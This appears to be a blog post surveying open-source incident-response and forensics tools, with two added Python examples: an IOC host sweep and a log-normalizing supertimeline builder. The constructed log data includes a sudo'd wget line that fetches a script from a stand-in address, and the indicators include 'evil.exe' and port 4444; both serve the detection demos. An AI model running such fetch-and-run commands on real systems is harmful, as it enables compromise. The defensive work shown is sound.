Here are some useful open source projects for detecting and investigating incidents. A couple of them I just found out about today.
1) PyIOC
A while ago Mandiant released a free tool called IOC-Editor to create Indicator of Compromise (IOC) signatures. So if you investigate an attack, you can create IOCs from your analysis, which can then be used to check other computers on your network for specific criteria, such as a file name, MD5 hash, process, open port, or registry key, that indicate other computers have been compromised as well.
Now there is a new Python project called PyIOC that lets you push out a client program to computers on your network; the client runs, downloads .ioc files from a server, and checks whether that computer is showing signs it has been compromised. It apparently has both a Windows and a Linux client.
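To make the "check a host against an IOC" idea concrete, here is an added example (my own code, not PyIOC's or Mandiant's) of a minimal sweep that matches a file name, an MD5 hash, a process name and a listening port against a small in-memory IOC. The `Indicator`/`IOC` classes stand in for a parsed .ioc file, the sample file and indicator values are constructed for the demo, and the process and port lists are passed in rather than collected from the host, so it runs anywhere; registry key checks are left out because they are Windows-only.

```python
"""Minimal host IOC sweep: file name, MD5 hash, process name and open port.

Added example (not PyIOC's or Mandiant's code). The IOC structure below is a
constructed in-memory stand-in for a parsed .ioc file; the sample file and
indicator values are constructed for the demo, not real IoCs.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass, field


@dataclass
class Indicator:
    kind: str    # one of: "filename", "md5", "process", "open_port"
    value: str


@dataclass
class IOC:
    name: str
    indicators: list = field(default_factory=list)

    def values(self, kind):
        """All indicator values of one kind, lower-cased for case-insensitive matching."""
        return {i.value.lower() for i in self.indicators if i.kind == kind}


def md5_of(path):
    """MD5 of a file, read in chunks so large files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_files(root, ioc):
    """Walk `root`; return sorted (indicator kind, path) pairs that match the IOC."""
    names, hashes = ioc.values("filename"), ioc.values("md5")
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if fn.lower() in names:
                hits.append(("filename", path))
            if hashes:           # only hash files when the IOC actually carries hashes
                try:
                    if md5_of(path) in hashes:
                        hits.append(("md5", path))
                except OSError:  # unreadable file: skip it, do not abort the sweep
                    continue
    return sorted(hits)


def check_processes(running, ioc):
    """Match a list of running process names (e.g. from ps / tasklist) against the IOC."""
    wanted = ioc.values("process")
    return sorted(p for p in running if p.lower() in wanted)


def check_ports(listening, ioc):
    """Match a list of listening TCP ports (e.g. from netstat / ss) against the IOC."""
    wanted = {int(v) for v in ioc.values("open_port")}
    return sorted(p for p in listening if p in wanted)


def demo():
    """Constructed scenario: one 'bad' file, one benign file, fake process and port lists."""
    with tempfile.TemporaryDirectory() as root:
        bad = os.path.join(root, "svchost32.exe")      # constructed name, not a real IoC
        with open(bad, "wb") as f:
            f.write(b"constructed sample content")
        with open(os.path.join(root, "readme.txt"), "wb") as f:
            f.write(b"benign")
        ioc = IOC("constructed-demo", [
            Indicator("filename", "svchost32.exe"),
            Indicator("md5", md5_of(bad)),             # hash taken from the sample itself
            Indicator("process", "evil.exe"),
            Indicator("open_port", "4444"),
        ])
        return {
            "files": [kind for kind, _ in sweep_files(root, ioc)],
            "processes": check_processes(["explorer.exe", "Evil.exe", "sshd"], ioc),
            "ports": check_ports([22, 80, 4444], ioc),
        }


if __name__ == "__main__":
    print(demo())
```

A real client would feed `check_processes` and `check_ports` from the host's process and socket tables and pull the IOC from the server; the matching logic stays the same. Hashing every file on a disk is the slow part, which is why the sweep only hashes when the IOC actually carries hash indicators.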
List of current checks it's capable of:
2) Security Onion
makes Network Security Monitoring way easier than it is now. It includes everything you need to investigate IDS alerts. With a couple of clicks you can drill down from a Snort alert and get easy access to full-content PCAPs, HTTP logs, session logs, syslogs, OSSEC logs, run a database query, etc.
The latest version that's going to be released shortly includes an easy installer where you can install a sensor in around 10 minutes.
Presentation video: Security Onion Network Security Monitoring in minutes
3) Volatility 2.2
is written in Python, can analyze memory images, and has been beyond awesome on Windows. How analysts went so long without memory analysis like this is amazing. It now officially supports both 32- and 64-bit versions of Linux. You can see in the above link that there are all kinds of plugins, and people are continually coming up with new ones. I just saw a plugin yesterday that can even get a screenshot of the Windows desktop from a memory image, and I'm sure equally cool Linux plugins will follow.
The really cool thing is that just like malware has problems hiding on a dead hard drive, it also has problems hiding from a memory image loaded in Volatility.
4) Enterprise Log Search and Archive (ELSA)
I just discovered Enterprise Log Search and Archive (ELSA), which is basically an open source alternative to Splunk. It acts as a kind of Google for your logs by normalizing various logs and allowing you to easily run fairly complex queries: Example
It's also going to be included in the 12.04 release of Security Onion, which is currently in Beta, but due for official release soon.
5) Log2Timeline
Analysts used to create timelines based solely on the MAC times of files. Now they're creating "supertimelines" with Log2Timeline that incorporate not just MAC times from files, but logs, browser history, and all kinds of other sources of evidence that have a timestamp associated with them. Being able to see a timeline that contains evidence other than just MAC times gives analysts more context and a better understanding of what happened.
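The two ideas above, normalizing different log formats into one searchable schema (what ELSA does) and merging every timestamped source into one ordered supertimeline (what Log2Timeline does), share the same first step, so here is one added example (my own code, not ELSA's or log2timeline's) covering both. The syslog, Apache, browser history and file MAC-time inputs are constructed sample data; the host names and the year assigned to the year-less syslog lines are assumptions marked in comments.

```python
"""Normalize heterogeneous logs into one schema, query them, and build a supertimeline.

Added example (not ELSA's or log2timeline's code). All log lines, the browser
history CSV and the file MAC times below are constructed sample data; host
names and the syslog year are assumptions noted in comments.
"""
import csv
import io
import re
from datetime import datetime, timezone

# --- constructed sample sources -------------------------------------------
SYSLOG = """Nov  3 10:15:02 web01 sshd[2201]: Accepted password for admin from 10.0.0.5 port 51022 ssh2
Nov  3 10:15:09 web01 sudo: admin : TTY=pts/0 ; PWD=/home/admin ; COMMAND=/usr/bin/wget http://203.0.113.9/x.sh"""

APACHE = """10.0.0.5 - - [03/Nov/2012:10:14:55 +0000] "GET /login.php HTTP/1.1" 200 512
10.0.0.5 - - [03/Nov/2012:10:14:58 +0000] "POST /login.php HTTP/1.1" 302 0"""

BROWSER_CSV = """timestamp,url
2012-11-03T10:16:30Z,http://203.0.113.9/x.sh"""

MAC_TIMES = [("/tmp/x.sh", "2012-11-03T10:16:31Z")]   # (path, mtime) from a constructed body file

SYSLOG_YEAR = 2012          # assumption: classic syslog lines carry no year
SYSLOG_RE = re.compile(r"(\w{3})\s+(\d+) (\d\d:\d\d:\d\d) (\S+) (\S+?)(?:\[\d+\])?: (.*)")
APACHE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def iso_utc(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_syslog(text):
    """syslog -> common schema; 'program' drops its [pid] suffix so queries can match it."""
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        mon, day, clock, host, prog, msg = m.groups()
        ts = datetime.strptime(f"{SYSLOG_YEAR} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
        yield {"ts": ts.replace(tzinfo=timezone.utc), "source": "syslog",
               "host": host, "program": prog, "msg": msg}


def parse_apache(text, host="web01"):   # host is an assumption: access logs do not name the server
    """Apache access log -> common schema, keeping the client IP as its own field."""
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        ip, tstr, method, path, status, _size = m.groups()
        yield {"ts": datetime.strptime(tstr, "%d/%b/%Y:%H:%M:%S %z"), "source": "apache",
               "host": host, "program": "httpd", "src_ip": ip,
               "msg": f"{ip} {method} {path} {status}"}


def parse_browser(text, host="ws-admin"):   # constructed workstation name
    """Browser history export (CSV) -> common schema."""
    for row in csv.DictReader(io.StringIO(text)):
        yield {"ts": iso_utc(row["timestamp"]), "source": "browser",
               "host": host, "program": "firefox", "msg": f"visited {row['url']}"}


def parse_mac_times(entries, host="web01"):
    """File modification times -> common schema (the classic MAC-time timeline)."""
    for path, mtime in entries:
        yield {"ts": iso_utc(mtime), "source": "filesystem",
               "host": host, "program": "fs", "msg": f"modified {path}"}


def query(events, text=None, **fields):
    """ELSA-style search: free text against msg, plus exact field=value filters."""
    return [e for e in events
            if (text is None or text in e["msg"])
            and all(e.get(k) == v for k, v in fields.items())]


def supertimeline(*streams):
    """Merge any number of normalized event streams into one time-ordered list."""
    return sorted((e for s in streams for e in s), key=lambda e: e["ts"])


def build_timeline():
    return supertimeline(parse_syslog(SYSLOG), parse_apache(APACHE),
                         parse_browser(BROWSER_CSV), parse_mac_times(MAC_TIMES))


def render(events):
    return [f"{e['ts']:%Y-%m-%d %H:%M:%S} {e['host']:8} {e['source']:10} {e['msg']}" for e in events]


if __name__ == "__main__":
    tl = build_timeline()
    print("\n".join(render(tl)))
    print("-- events mentioning 203.0.113.9 --")
    print("\n".join(render(query(tl, text="203.0.113.9"))))
```

Run stand-alone, the merged timeline shows the web login, the SSH login, the sudo'd wget, the browser visit and the file write in order, across two hosts and four evidence types; the `query` call then pulls out only the events that mention the same address, which is the "Google for your logs" view the post describes. The one thing worth noticing is that every parser has to produce timezone-aware timestamps, otherwise the merge silently misorders sources that log in different zones.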
6) SANS Investigative Forensic Toolkit (SIFT) Workstation
There is BackTrack for pentesting, there is Security Onion for NSM, and there is the SANS Investigative Forensic Toolkit (SIFT) Workstation for digital forensics. It contains Log2Timeline, Volatility, The Sleuth Kit, and a heck of a lot more tools for digital forensics, and is updated with the latest tools fairly often.
7) Google Rapid Response (GRR)
is a Python framework for live remote forensics. You can connect to remote computers and run Volatility plugins, The Sleuth Kit, create timelines, get running processes, network connections, retrieve files, run commands, browse the file system, etc. Unfortunately, it's currently in Alpha stage, and has been for a while, but does seem to be updated every so often. User Manual
, but it's not a complete demo... Search for computer "domU".
We have all kinds of useful (and free) tools for detecting and investigating attacks right now. I'm sure there are more new projects coming up, so if you know of any, let me know.